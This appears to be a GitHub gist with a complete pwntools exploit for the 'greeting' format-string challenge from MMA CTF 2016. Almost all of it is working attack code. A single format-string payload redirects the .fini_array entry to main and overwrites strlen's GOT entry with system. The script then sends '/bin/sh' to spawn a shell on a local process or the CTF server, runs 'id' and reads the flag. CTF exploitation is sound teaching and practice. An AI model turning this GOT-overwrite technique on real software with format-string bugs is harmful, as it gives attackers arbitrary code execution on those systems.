@wumb0
Last active September 6, 2016 01:06
pwntools exploit for the "greeting" pwn challenge from MMA CTF 2016 (single format-string pass: .fini_array entry -> main, GOT strlen -> system, then "/bin/sh" as the name)
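"""Exploit for the "greeting" pwn challenge (MMA CTF 2016).

One format-string pass performs two writes: it points the binary's
.fini_array entry back at main (so the process re-enters main after the
first printf instead of exiting) and it replaces strlen's GOT slot with
system. On the second trip through main the "name" we send ("/bin/sh")
is passed to strlen(), which is now system(), giving a shell.

Run with ``REMOTE=1`` on the command line to attack the CTF server;
otherwise a local ./greeting process is spawned.
"""
from pwn import *
from libformatstr import FormatStr

context.log_level = 'info'
e = ELF("./greeting")

if args.get('REMOTE'):
    r = remote('pwn2.chal.ctf.westerns.tokyo', 16317, timeout=10)
else:
    r = process(e.path)

# Write set for the format string: fini_array entry -> main, GOT strlen -> system.
# Both addresses come from the target ELF itself (no libc leak needed), which
# presumes a non-PIE binary that already imports system -- confirm with checksec.
p = FormatStr()
p[e.sym['__do_global_dtors_aux_fini_array_entry']] = e.sym['main']
p[e.sym['got.strlen']] = e.symbols['system']

# The program echoes "Nice to meet you, " ahead of our buffer, so the %n byte
# counting has to start at that length rather than at zero.
prefix_len = len("Nice to meet you, ")
# 12 = printf argument index where our buffer lands, 2 = alignment padding;
# both are specific to this binary and were determined by hand.
buf = p.payload(12, 2, start_len=prefix_len)
log.debug(hexdump(buf))
log.debug(len(buf))
log.debug(buf)

try:
    r.sendline(buf)
    log.success("Wrote system onto strlen and main onto fini... trying shell")
    # Second pass through main: this "name" becomes the argument to system().
    r.sendline(b'/bin/sh')
    r.recvrepeat(3)
    r.sendline(b'id')
    # bytes literals keep this working on both Python 2 and Python 3 pwntools,
    # where tube.recv*() returns bytes ("uid=" in bytes is a TypeError on 3).
    if b"uid=" in r.recvrepeat(.5):
        log.success("got shell")
        r.sendline(b'cat flag')
        log.success("Flag: " + r.recv(1024).decode('latin-1'))
    else:
        # log.error() raises PwnlibException (non-zero exit); the finally
        # below still closes the tube on that path.
        log.error("Failed... try again")
finally:
    r.close()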